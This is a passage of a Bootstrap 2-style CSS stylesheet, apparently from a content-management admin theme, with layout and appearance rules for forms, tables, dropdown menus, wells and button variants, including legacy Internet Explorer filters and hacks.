.form-inline .uneditable-input,
.form-inline .input-prepend,
.form-inline .input-append,
.form-horizontal input,
.form-horizontal textarea,
.form-horizontal select,
.form-horizontal .help-inline,
.form-horizontal .uneditable-input,
.form-horizontal .input-prepend,
.form-horizontal .input-append {
	display: inline-block;
	*display: inline;
	*zoom: 1;
	margin-bottom: 0;
	vertical-align: middle;
}
.form-search .hide,
.form-inline .hide,
.form-horizontal .hide {
	display: none;
}
.form-search label,
.form-inline label,
.form-search .btn-group,
.form-inline .btn-group {
	display: inline-block;
}
.form-search .input-append,
.form-inline .input-append,
.form-search .input-prepend,
.form-inline .input-prepend {
	margin-bottom: 0;
}
.form-search .radio,
.form-search .checkbox,
.form-inline .radio,
.form-inline .checkbox {
	padding-left: 0;
	margin-bottom: 0;
	vertical-align: middle;
}
.form-search .radio input[type="radio"],
.form-search .checkbox input[type="checkbox"],
.form-inline .radio input[type="radio"],
.form-inline .checkbox input[type="checkbox"] {
	float: left;
	margin-right: 3px;
	margin-left: 0;
}
.control-group {
	margin-bottom: 9px;
}
legend + .control-group {
	margin-top: 18px;
	-webkit-margin-top-collapse: separate;
}
.form-horizontal .control-group {
	margin-bottom: 18px;
	*zoom: 1;
}
.form-horizontal .control-group:before,
.form-horizontal .control-group:after {
	display: table;
	content: "";
	line-height: 0;
}
.form-horizontal .control-group:after {
	clear: both;
}
.form-horizontal .control-label {
	float: left;
	width: 160px;
	padding-top: 5px;
	text-align: right;
}
.form-horizontal .controls {
	*display: inline-block;
	*padding-left: 20px;
	margin-left: 180px;
	*margin-left: 0;
}
.form-horizontal .controls:first-child {
	*padding-left: 180px;
}
.form-horizontal .help-block {
	margin-bottom: 0;
}
.form-horizontal input + .help-block,
.form-horizontal select + .help-block,
.form-horizontal textarea + .help-block,
.form-horizontal .uneditable-input + .help-block,
.form-horizontal .input-prepend + .help-block,
.form-horizontal .input-append + .help-block {
	margin-top: 9px;
}
.form-horizontal .form-actions {
	padding-left: 180px;
}
.control-label .hasPopover,
.control-label .hasTooltip {
	display: inline-block;
}
.subform-repeatable-wrapper .btn-group>.btn.button {
	min-width: 0;
}
.subform-repeatable-wrapper .ui-sortable-helper {
	background: #fff;
}
.subform-repeatable-wrapper tr.ui-sortable-helper {
	display: table;
}
@media (min-width: 980px) and (max-width: 1215px) {
	.float-cols .control-label {
		float: none;
	}
	.float-cols .controls {
		margin-left: 0;
	}
}
table {
	max-width: 100%;
	background-color: transparent;
	border-collapse: collapse;
	border-spacing: 0;
}
.table {
	width: 100%;
	margin-bottom: 18px;
}
.table th,
.table td {
	padding: 8px;
	line-height: 18px;
	text-align: left;
	vertical-align: top;
	border-top: 1px solid #ddd;
}
.table th {
	font-weight: bold;
}
.table thead th {
	vertical-align: bottom;
}
.table caption + thead tr:first-child th,
.table caption + thead tr:first-child td,
.table colgroup + thead tr:first-child th,
.table colgroup + thead tr:first-child td,
.table thead:first-child tr:first-child th,
.table thead:first-child tr:first-child td {
	border-top: 0;
}
.table tbody + tbody {
	border-top: 2px solid #ddd;
}
.table .table {
	background-color: #fff;
}
.table-condensed th,
.table-condensed td {
	padding: 4px 5px;
}
.table-bordered {
	border: 1px solid #ddd;
	border-collapse: separate;
	*border-collapse: collapse;
	border-left: 0;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
}
.table-bordered th,
.table-bordered td {
	border-left: 1px solid #ddd;
}
.table-bordered caption + thead tr:first-child th,
.table-bordered caption + tbody tr:first-child th,
.table-bordered caption + tbody tr:first-child td,
.table-bordered colgroup + thead tr:first-child th,
.table-bordered colgroup + tbody tr:first-child th,
.table-bordered colgroup + tbody tr:first-child td,
.table-bordered thead:first-child tr:first-child th,
.table-bordered tbody:first-child tr:first-child th,
.table-bordered tbody:first-child tr:first-child td {
	border-top: 0;
}
.table-bordered thead:first-child tr:first-child > th:first-child,
.table-bordered tbody:first-child tr:first-child > td:first-child,
.table-bordered tbody:first-child tr:first-child > th:first-child {
	-webkit-border-top-left-radius: 4px;
	-moz-border-radius-topleft: 4px;
	border-top-left-radius: 4px;
}
.table-bordered thead:first-child tr:first-child > th:last-child,
.table-bordered tbody:first-child tr:first-child > td:last-child,
.table-bordered tbody:first-child tr:first-child > th:last-child {
	-webkit-border-top-right-radius: 4px;
	-moz-border-radius-topright: 4px;
	border-top-right-radius: 4px;
}
.table-bordered thead:last-child tr:last-child > th:first-child,
.table-bordered tbody:last-child tr:last-child > td:first-child,
.table-bordered tbody:last-child tr:last-child > th:first-child,
.table-bordered tfoot:last-child tr:last-child > td:first-child,
.table-bordered tfoot:last-child tr:last-child > th:first-child {
	-webkit-border-bottom-left-radius: 4px;
	-moz-border-radius-bottomleft: 4px;
	border-bottom-left-radius: 4px;
}
.table-bordered thead:last-child tr:last-child > th:last-child,
.table-bordered tbody:last-child tr:last-child > td:last-child,
.table-bordered tbody:last-child tr:last-child > th:last-child,
.table-bordered tfoot:last-child tr:last-child > td:last-child,
.table-bordered tfoot:last-child tr:last-child > th:last-child {
	-webkit-border-bottom-right-radius: 4px;
	-moz-border-radius-bottomright: 4px;
	border-bottom-right-radius: 4px;
}
.table-bordered tfoot + tbody:last-child tr:last-child td:first-child {
	-webkit-border-bottom-left-radius: 0;
	-moz-border-radius-bottomleft: 0;
	border-bottom-left-radius: 0;
}
.table-bordered tfoot + tbody:last-child tr:last-child td:last-child {
	-webkit-border-bottom-right-radius: 0;
	-moz-border-radius-bottomright: 0;
	border-bottom-right-radius: 0;
}
.table-bordered caption + thead tr:first-child th:first-child,
.table-bordered caption + tbody tr:first-child td:first-child,
.table-bordered colgroup + thead tr:first-child th:first-child,
.table-bordered colgroup + tbody tr:first-child td:first-child {
	-webkit-border-top-left-radius: 4px;
	-moz-border-radius-topleft: 4px;
	border-top-left-radius: 4px;
}
.table-bordered caption + thead tr:first-child th:last-child,
.table-bordered caption + tbody tr:first-child td:last-child,
.table-bordered colgroup + thead tr:first-child th:last-child,
.table-bordered colgroup + tbody tr:first-child td:last-child {
	-webkit-border-top-right-radius: 4px;
	-moz-border-radius-topright: 4px;
	border-top-right-radius: 4px;
}
.table-striped tbody > tr:nth-child(odd) > td,
.table-striped tbody > tr:nth-child(odd) > th {
	background-color: #f9f9f9;
}
.table-hover tbody tr:hover > td,
.table-hover tbody tr:hover > th {
	background-color: #f5f5f5;
}
table td[class*="span"],
table th[class*="span"],
.row-fluid table td[class*="span"],
.row-fluid table th[class*="span"] {
	display: table-cell;
	float: none;
	margin-left: 0;
}
.table td.span1,
.table th.span1 {
	float: none;
	width: 44px;
	margin-left: 0;
}
.table td.span2,
.table th.span2 {
	float: none;
	width: 124px;
	margin-left: 0;
}
.table td.span3,
.table th.span3 {
	float: none;
	width: 204px;
	margin-left: 0;
}
.table td.span4,
.table th.span4 {
	float: none;
	width: 284px;
	margin-left: 0;
}
.table td.span5,
.table th.span5 {
	float: none;
	width: 364px;
	margin-left: 0;
}
.table td.span6,
.table th.span6 {
	float: none;
	width: 444px;
	margin-left: 0;
}
.table td.span7,
.table th.span7 {
	float: none;
	width: 524px;
	margin-left: 0;
}
.table td.span8,
.table th.span8 {
	float: none;
	width: 604px;
	margin-left: 0;
}
.table td.span9,
.table th.span9 {
	float: none;
	width: 684px;
	margin-left: 0;
}
.table td.span10,
.table th.span10 {
	float: none;
	width: 764px;
	margin-left: 0;
}
.table td.span11,
.table th.span11 {
	float: none;
	width: 844px;
	margin-left: 0;
}
.table td.span12,
.table th.span12 {
	float: none;
	width: 924px;
	margin-left: 0;
}
.table tbody tr.success > td {
	background-color: #dff0d8;
}
.table tbody tr.error > td {
	background-color: #f2dede;
}
.table tbody tr.warning > td {
	background-color: #fcf8e3;
}
.table tbody tr.info > td {
	background-color: #d9edf7;
}
.table-hover tbody tr.success:hover > td {
	background-color: #d0e9c6;
}
.table-hover tbody tr.error:hover > td {
	background-color: #ebcccc;
}
.table-hover tbody tr.warning:hover > td {
	background-color: #faf2cc;
}
.table-hover tbody tr.info:hover > td {
	background-color: #c4e3f3;
}
.table-noheader {
	border-collapse: collapse;
}
.table-noheader thead {
	display: none;
}
.dropup,
.dropdown {
	position: relative;
}
.dropdown-toggle {
	*margin-bottom: -3px;
}
.dropdown-toggle:active,
.open .dropdown-toggle {
	outline: 0;
}
.caret {
	display: inline-block;
	width: 0;
	height: 0;
	vertical-align: top;
	border-top: 4px solid #000;
	border-right: 4px solid transparent;
	border-left: 4px solid transparent;
	content: "";
}
.dropdown .caret {
	margin-top: 8px;
	margin-left: 2px;
}
.dropdown-menu {
	position: absolute;
	top: 100%;
	left: 0;
	z-index: 1000;
	display: none;
	float: left;
	min-width: 160px;
	padding: 5px 0;
	margin: 2px 0 0;
	list-style: none;
	background-color: #fff;
	border: 1px solid #ccc;
	border: 1px solid rgba(0,0,0,0.2);
	*border-right-width: 2px;
	*border-bottom-width: 2px;
	-webkit-border-radius: 6px;
	-moz-border-radius: 6px;
	border-radius: 6px;
	-webkit-box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	-moz-box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	-webkit-background-clip: padding-box;
	-moz-background-clip: padding;
	background-clip: padding-box;
}
.dropdown-menu.pull-right {
	right: 0;
	left: auto;
}
.dropdown-menu .divider {
	*width: 100%;
	height: 1px;
	margin: 8px 1px;
	*margin: -5px 0 5px;
	overflow: hidden;
	background-color: #e5e5e5;
	border-bottom: 1px solid #fff;
}
.dropdown-menu .menuitem-group {
	margin: 4px 1px;
	overflow: hidden;
	border-top: 1px solid #eee;
	border-bottom: 1px solid #eee;
	background-color: #eee;
	color: #555;
	text-transform: capitalize;
	font-size: 95%;
	padding: 3px 20px;
}
.dropdown-menu > li > a {
	display: block;
	padding: 3px 20px;
	clear: both;
	font-weight: normal;
	line-height: 18px;
	color: #333;
	white-space: nowrap;
}
.dropdown-menu > li > a:hover,
.dropdown-menu > li > a:focus,
.dropdown-submenu:hover > a,
.dropdown-submenu:focus > a {
	text-decoration: none;
	color: #fff;
	background-color: #005783;
	background-image: -moz-linear-gradient(top,#005e8d,#004d74);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#005e8d),to(#004d74));
	background-image: -webkit-linear-gradient(top,#005e8d,#004d74);
	background-image: -o-linear-gradient(top,#005e8d,#004d74);
	background-image: linear-gradient(to bottom,#005e8d,#004d74);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff005e8d', endColorstr='#ff004c73', GradientType=0);
}
.dropdown-menu > .active > a,
.dropdown-menu > .active > a:hover,
.dropdown-menu > .active > a:focus {
	color: #333;
	text-decoration: none;
	outline: 0;
	background-color: #005783;
	background-image: -moz-linear-gradient(top,#005e8d,#004d74);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#005e8d),to(#004d74));
	background-image: -webkit-linear-gradient(top,#005e8d,#004d74);
	background-image: -o-linear-gradient(top,#005e8d,#004d74);
	background-image: linear-gradient(to bottom,#005e8d,#004d74);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff005e8d', endColorstr='#ff004c73', GradientType=0);
}
.dropdown-menu > .disabled > a,
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
	color: #999;
}
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
	text-decoration: none;
	background-color: transparent;
	background-image: none;
	filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
	cursor: default;
}
.open {
	*z-index: 1000;
}
.open > .dropdown-menu {
	display: block;
}
.dropdown-backdrop {
	position: fixed;
	left: 0;
	right: 0;
	bottom: 0;
	top: 0;
	z-index: 990;
}
.pull-right > .dropdown-menu {
	right: 0;
	left: auto;
}
.dropup .caret,
.navbar-fixed-bottom .dropdown .caret {
	border-top: 0;
	border-bottom: 4px solid #000;
	content: "";
}
.dropup .dropdown-menu,
.navbar-fixed-bottom .dropdown .dropdown-menu {
	top: auto;
	bottom: 100%;
	margin-bottom: 1px;
}
.dropdown-submenu {
	position: relative;
}
.dropdown-submenu > .dropdown-menu {
	top: 0;
	left: 100%;
	margin-top: -6px;
	margin-left: -1px;
	-webkit-border-radius: 6px 6px 6px 6px;
	-moz-border-radius: 6px 6px 6px 6px;
	border-radius: 6px 6px 6px 6px;
}
.dropdown-submenu:hover > .dropdown-menu {
	display: block;
}
.dropup .dropdown-submenu > .dropdown-menu {
	top: auto;
	bottom: 0;
	margin-top: 0;
	margin-bottom: -2px;
	-webkit-border-radius: 5px 5px 5px 0;
	-moz-border-radius: 5px 5px 5px 0;
	border-radius: 5px 5px 5px 0;
}
.dropdown-submenu > a:after {
	display: block;
	content: " ";
	float: right;
	width: 0;
	height: 0;
	border-color: transparent;
	border-style: solid;
	border-width: 5px 0 5px 5px;
	border-left-color: #cccccc;
	margin-top: 5px;
	margin-right: -10px;
}
.dropdown-submenu:hover > a:after {
	border-left-color: #fff;
}
.dropdown-submenu.pull-left {
	float: none;
}
.dropdown-submenu.pull-left > .dropdown-menu {
	left: -100%;
	margin-left: 10px;
	-webkit-border-radius: 6px 0 6px 6px;
	-moz-border-radius: 6px 0 6px 6px;
	border-radius: 6px 0 6px 6px;
}
.dropdown .dropdown-menu .nav-header {
	padding-left: 20px;
	padding-right: 20px;
}
.typeahead {
	z-index: 1051;
	margin-top: 2px;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
}
.well {
	min-height: 20px;
	padding: 19px;
	margin-bottom: 20px;
	background-color: #f5f5f5;
	border: 1px solid #e3e3e3;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
	-webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.05);
	-moz-box-shadow: inset 0 1px 1px rgba(0,0,0,0.05);
	box-shadow: inset 0 1px 1px rgba(0,0,0,0.05);
}
.well blockquote {
	border-color: #ddd;
	border-color: rgba(0,0,0,0.15);
}
.well-large {
	padding: 24px;
	-webkit-border-radius: 6px;
	-moz-border-radius: 6px;
	border-radius: 6px;
}
.well-small {
	padding: 9px;
	-webkit-border-radius: 3px;
	-moz-border-radius: 3px;
	border-radius: 3px;
}
.fade {
	opacity: 0;
	-webkit-transition: opacity .15s linear;
	-moz-transition: opacity .15s linear;
	-o-transition: opacity .15s linear;
	transition: opacity .15s linear;
}
.fade.in {
	opacity: 1;
}
.collapse {
	position: relative;
	height: 0;
	overflow: hidden;
	-webkit-transition: height .35s ease;
	-moz-transition: height .35s ease;
	-o-transition: height .35s ease;
	transition: height .35s ease;
}
.collapse.in {
	height: auto;
}
.close {
	float: right;
	font-size: 20px;
	font-weight: bold;
	line-height: 18px;
	color: #000;
	text-shadow: 0 1px 0 #ffffff;
	opacity: 0.2;
	filter: alpha(opacity=20);
}
.close:hover,
.close:focus {
	color: #000;
	text-decoration: none;
	cursor: pointer;
	opacity: 0.4;
	filter: alpha(opacity=40);
}
button.close {
	padding: 3;
	cursor: pointer;
	background: transparent;
	border: 0;
	-webkit-appearance: none;
}
.alert-options {
	float: right;
	line-height: 18px;
	color: #000;
	text-shadow: 0 1px 0 #ffffff;
	opacity: 0.2;
	filter: alpha(opacity=20);
}
.alert-options:hover,
.alert-options:focus {
	color: #000;
	text-decoration: none;
	cursor: pointer;
	opacity: 0.4;
	filter: alpha(opacity=40);
}
.btn {
	display: inline-block;
	*display: inline;
	*zoom: 1;
	padding: 4px 12px;
	margin-bottom: 0;
	font-size: 13px;
	line-height: 18px;
	text-align: center;
	vertical-align: middle;
	cursor: pointer;
	color: #333;
	text-shadow: 0 1px 1px rgba(255,255,255,0.75);
	background-color: #f5f5f5;
	background-image: -moz-linear-gradient(top,#fff,#e6e6e6);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#fff),to(#e6e6e6));
	background-image: -webkit-linear-gradient(top,#fff,#e6e6e6);
	background-image: -o-linear-gradient(top,#fff,#e6e6e6);
	background-image: linear-gradient(to bottom,#fff,#e6e6e6);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffffff', endColorstr='#ffe5e5e5', GradientType=0);
	border-color: #e6e6e6 #e6e6e6 #bfbfbf;
	*background-color: #e6e6e6;
	filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
	border: 1px solid #bbb;
	*border: 0;
	border-bottom-color: #a2a2a2;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
	*margin-left: .3em;
	-webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05);
	-moz-box-shadow: inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05);
	box-shadow: inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05);
}
.btn:hover,
.btn:focus,
.btn:active,
.btn.active,
.btn.disabled,
.btn[disabled] {
	color: #333;
	background-color: #e6e6e6;
	*background-color: #d9d9d9;
}
.btn:active,
.btn.active {
	background-color: #cccccc \9;
}
.btn:first-child {
	*margin-left: 0;
}
.btn:hover,
.btn:focus {
	color: #333;
	text-decoration: none;
	background-position: 0 -15px;
	-webkit-transition: background-position .1s linear;
	-moz-transition: background-position .1s linear;
	-o-transition: background-position .1s linear;
	transition: background-position .1s linear;
}
.btn:focus {
	outline: thin dotted #333;
	outline: 5px auto -webkit-focus-ring-color;
	outline-offset: -2px;
}
.btn.active,
.btn:active {
	background-image: none;
	outline: 0;
	-webkit-box-shadow: inset 0 2px 4px rgba(0,0,0,.15), 0 1px 2px rgba(0,0,0,.05);
	-moz-box-shadow: inset 0 2px 4px rgba(0,0,0,.15), 0 1px 2px rgba(0,0,0,.05);
	box-shadow: inset 0 2px 4px rgba(0,0,0,.15), 0 1px 2px rgba(0,0,0,.05);
}
.btn.disabled,
.btn[disabled] {
	cursor: default;
	background-image: none;
	opacity: 0.65;
	filter: alpha(opacity=65);
	-webkit-box-shadow: none;
	-moz-box-shadow: none;
	box-shadow: none;
}
.btn-large {
	padding: 11px 19px;
	font-size: 16.25px;
	-webkit-border-radius: 6px;
	-moz-border-radius: 6px;
	border-radius: 6px;
}
.btn-large [class^="icon-"],
.btn-large [class*=" icon-"] {
	margin-top: 4px;
}
.btn-small {
	padding: 2px 10px;
	font-size: 12px;
	-webkit-border-radius: 3px;
	-moz-border-radius: 3px;
	border-radius: 3px;
}
.btn-small [class^="icon-"],
.btn-small [class*=" icon-"] {
	margin-top: 0;
}
.btn-mini [class^="icon-"],
.btn-mini [class*=" icon-"] {
	margin-top: -1px;
}
.btn-mini {
	padding: 0 6px;
	font-size: 9.75px;
	-webkit-border-radius: 3px;
	-moz-border-radius: 3px;
	border-radius: 3px;
}
.btn-block {
	display: block;
	width: 100%;
	padding-left: 0;
	padding-right: 0;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
}
.btn-block + .btn-block {
	margin-top: 5px;
}
input[type="submit"].btn-block,
input[type="reset"].btn-block,
input[type="button"].btn-block {
	width: 100%;
}
.btn-primary.active,
.btn-warning.active,
.btn-danger.active,
.btn-success.active,
.btn-info.active,
.btn-inverse.active {
	color: rgba(255,255,255,0.75);
}
.btn-primary {
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
	background-color: #004b8d;
	background-image: -moz-linear-gradient(top,#005e8d,#002f8d);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#005e8d),to(#002f8d));
	background-image: -webkit-linear-gradient(top,#005e8d,#002f8d);
	background-image: -o-linear-gradient(top,#005e8d,#002f8d);
	background-image: linear-gradient(to bottom,#005e8d,#002f8d);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff005e8d', endColorstr='#ff002e8d', GradientType=0);
	border-color: #002f8d #002f8d #001641;
	*background-color: #002f8d;
	filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
}
.btn-primary:hover,
.btn-primary:focus,
.btn-primary:active,
.btn-primary.active,
.btn-primary.disabled,
.btn-primary[disabled] {
	color: #fff;
	background-color: #002f8d;
	*background-color: #002674;
}
.btn-primary:active,
.btn-primary.active {
	background-color: #001e5a \9;
}
.btn-warning {
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
	background-color: #faa732;
	background-image: -moz-linear-gradient(top,#fbb450,#f89406);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#fbb450),to(#f89406));
	background-image: -webkit-linear-gradient(top,#fbb450,#f89406);
	background-image: -o-linear-gradient(top,#fbb450,#f89406);
	background-image: linear-gradient(to bottom,#fbb450,#f89406);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#fffab44f', endColorstr='#fff89406', GradientType=0);
	border-color: #f89406 #f89406 #ad6704;
	*background-color: #f89406;
	filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
}
.btn-warning:hover,
.btn-warning:focus,
.btn-warning:active,
.btn-warning.active,
.btn-warning.disabled,
.btn-warning[disabled] {
	color: #fff;
	background-color: #f89406;
	*background-color: #df8505;
}
.btn-warning:active,
.btn-warning.active {
	background-color: #c67605 \9;
}
.btn-danger {
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
	background-color: #da4f49;
	background-image: -moz-linear-gradient(top,#ee5f5b,#bd362f);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#ee5f5b),to(#bd362f));
	background-image: -webkit-linear-gradient(top,#ee5f5b,#bd362f);
	background-image: -o-linear-gradient(top,#ee5f5b,#bd362f);
	background-image: linear-gradient(to bottom,#ee5f5b,#bd362f);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffee5f5b', endColorstr='#ffbd362f', GradientType=0);
	border-color: #bd362f #bd362f #802420;
	*background-color: #bd362f;
	filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
}
.btn-danger:hover,
.btn-danger:focus,
.btn-danger:active,
.btn-danger.active,
.btn-danger.disabled,
.btn-danger[disabled] {
	color: #fff;
	background-color: #bd362f;
	*background-color: #a9302a;
}
.btn-danger:active,
.btn-danger.active {
	background-color: #942a25 \9;
}
.btn-success {
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
	background-color: #5bb75b;
	background-image: -moz-linear-gradient(top,#62c462,#51a351);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#62c462),to(#51a351));
	background-image: -webkit-linear-gradient(top,#62c462,#51a351);
	background-image: -o-linear-gradient(top,#62c462,#51a351);
	background-image: linear-gradient(to bottom,#62c462,#51a351);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff62c462', endColorstr='#ff51a351', GradientType=0);
	border-color: #51a351 #51a351 #387038;
	*background-color: #51a351;
	filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
}
.btn-success:hover,
.btn-success:focus,
.btn-success:active,
.btn-success.active,
.btn-success.disabled,
.btn-success[disabled] {
	color: #fff;
	background-color: #51a351;
	*background-color: #499249;
}
.btn-success:active,
.btn-success.active {
	background-color: #408140 \9;
}
.btn-info {
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
	background-color: #49afcd;
	background-image: -moz-linear-gradient(top,#5bc0de,#2f96b4);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#5bc0de),to(#2f96b4));
	background-image: -webkit-linear-gradient(top,#5bc0de,#2f96b4);
	background-image: -o-linear-gradient(top,#5bc0de,#2f96b4);
	background-image: linear-gradient(to bottom,#5bc0de,#2f96b4);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff5bc0de', endColorstr='#ff2f96b4', GradientType=0);
	border-color: #2f96b4 #2f96b4 #1f6377;
	*background-color: #2f96b4;
	filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
}
.btn-info:hover,
.btn-info:focus,
.btn-info:active,
.btn-info.active,
.btn-info.disabled,
.btn-info[disabled] {
	color: #fff;
	background-color: #2f96b4;
	*background-color: #2a85a0;
}
.btn-info:active,
.btn-info.active {
	background-color: #24748c \9;
}
.btn-inverse {
	color: #fff;
	text-shadow: 0 -1px 0 rgba(0,0,0,0.25);
	background-color: #363636;
	background-image: -moz-linear-gradient(top,#444,#222);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#444),to(#222));
	background-image: -webkit-linear-gradient(top,#444,#222);
	background-image: -o-linear-gradient(top,#444,#222);
	background-image: linear-gradient(to bottom,#444,#222);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff444444', endColorstr='#ff222222', GradientType=0);
	border-color: #222 #222 #000000;
	*background-color: #222;
	filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
}
.btn-inverse:hover,
.btn-inverse:focus,
.btn-inverse:active,
.btn-inverse.active,
.btn-inverse.disabled,
.btn-inverse[disabled] {
	color: #fff;
	background-color: #222;
	*background-color: #151515;
}
.btn-inverse:active,
.btn-inverse.active {
	background-color: #090909 \9;
}
button.btn,
input[type="submit"].btn {
	*padding-top: 3px;
	*padding-bottom: 3px;
}
button.btn::-moz-focus-inner,
input[type="submit"].btn::-moz-focus-inner {
	padding: 0;
	border: 0;
}
button.btn.btn-large,
input[type="submit"].btn.btn-large {
	*padding-top: 7px;
	*padding-bottom: 7px;
}
button.btn.btn-small,
input[type="submit"].btn.btn-small {
	*padding-top: 3px;
	*padding-bottom: 3px;
}
button.btn.btn-mini,
input[type="submit"].btn.btn-mini {
	*padding-top: 1px;
	*padding-bottom: 1px;
}
.btn-link,
.btn-link:active,
.btn-link[disabled] {
	background-color: transparent;
	background-image: none;
	-webkit-box-shadow: none;
	-moz-box-shadow: none;
	box-shadow: none;
}
.btn-link {
	border-color: transparent;
	cursor: pointer;
	color: #005e8d;
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.btn-link:hover,
.btn-link:focus {
	color: #002b41;
	text-decoration: underline;
	background-color: transparent;
}
.btn-link[disabled]:hover,
.btn-link[disabled]:focus {
	color: #333;
	text-decoration: none;
}
.btn-group {
	position: relative;
	display: inline-block;
	*display: inline;
	*zoom: 1;
	font-size: 0;
	vertical-align: middle;
	white-space: nowrap;
	*margin-left: .3em;
}
.btn-group:first-child {
	*margin-left: 0;
}
.btn-group + .btn-group {
	margin-left: 5px;
}
.btn-toolbar {
	font-size: 0;
	margin-top: 9px;
	margin-bottom: 9px;
}
.btn-toolbar > .btn + .btn,
.btn-toolbar > .btn-group + .btn,
.btn-toolbar > .btn + .btn-group {
	margin-left: 5px;
}
.btn-group > .btn {
	position: relative;
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.btn-group > .btn + .btn {
	margin-left: -1px;
}
.btn-group > .btn,
.btn-group > .dropdown-menu,
.btn-group > .popover {
	font-size: 13px;
}
.btn-group > .btn-mini {
	font-size: 9.75px;
}
.btn-group > .btn-small {
	font-size: 12px;
}
.btn-group > .btn-large {
	font-size: 16.25px;
}
.btn-group > .btn:first-child {
	margin-left: 0;
	-webkit-border-top-left-radius: 4px;
	-moz-border-radius-topleft: 4px;
	border-top-left-radius: 4px;
	-webkit-border-bottom-left-radius: 4px;
	-moz-border-radius-bottomleft: 4px;
	border-bottom-left-radius: 4px;
}
.btn-group > .btn:last-child,
.btn-group > .dropdown-toggle {
	-webkit-border-top-right-radius: 4px;
	-moz-border-radius-topright: 4px;
	border-top-right-radius: 4px;
	-webkit-border-bottom-right-radius: 4px;
	-moz-border-radius-bottomright: 4px;
	border-bottom-right-radius: 4px;
}
.btn-group > .btn.large:first-child {
	margin-left: 0;
	-webkit-border-top-left-radius: 6px;
	-moz-border-radius-topleft: 6px;
	border-top-left-radius: 6px;
	-webkit-border-bottom-left-radius: 6px;
	-moz-border-radius-bottomleft: 6px;
	border-bottom-left-radius: 6px;
}
.btn-group > .btn.large:last-child,
.btn-group > .large.dropdown-toggle {
	-webkit-border-top-right-radius: 6px;
	-moz-border-radius-topright: 6px;
	border-top-right-radius: 6px;
	-webkit-border-bottom-right-radius: 6px;
	-moz-border-radius-bottomright: 6px;
	border-bottom-right-radius: 6px;
}
.btn-group > .btn:hover,
.btn-group > .btn:focus,
.btn-group > .btn:active,
.btn-group > .btn.active {
	z-index: 2;
}
.btn-group .dropdown-toggle:active,
.btn-group.open .dropdown-toggle {
	outline: 0;
}
.btn-group > .btn + .dropdown-toggle {
	padding-left: 8px;
	padding-right: 8px;
	-webkit-box-shadow: inset 1px 0 0 rgba(255,255,255,.125), inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05);
	-moz-box-shadow: inset 1px 0 0 rgba(255,255,255,.125), inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05);
	box-shadow: inset 1px 0 0 rgba(255,255,255,.125), inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05);
	*padding-top: 5px;
	*padding-bottom: 5px;
}
.btn-group > .btn-mini + .dropdown-toggle {
	padding-left: 5px;
	padding-right: 5px;
	*padding-top: 2px;
	*padding-bottom: 2px;
}
.btn-group > .btn-small + .dropdown-toggle {
	*padding-top: 5px;
	*padding-bottom: 4px;
}
.btn-group > .btn-large + .dropdown-toggle {
	padding-left: 12px;
	padding-right: 12px;
	*padding-top: 7px;
	*padding-bottom: 7px;
}
.btn-group.open .dropdown-toggle {
	background-image: none;
	-webkit-box-shadow: inset 0 2px 4px rgba(0,0,0,.15), 0 1px 2px rgba(0,0,0,.05);
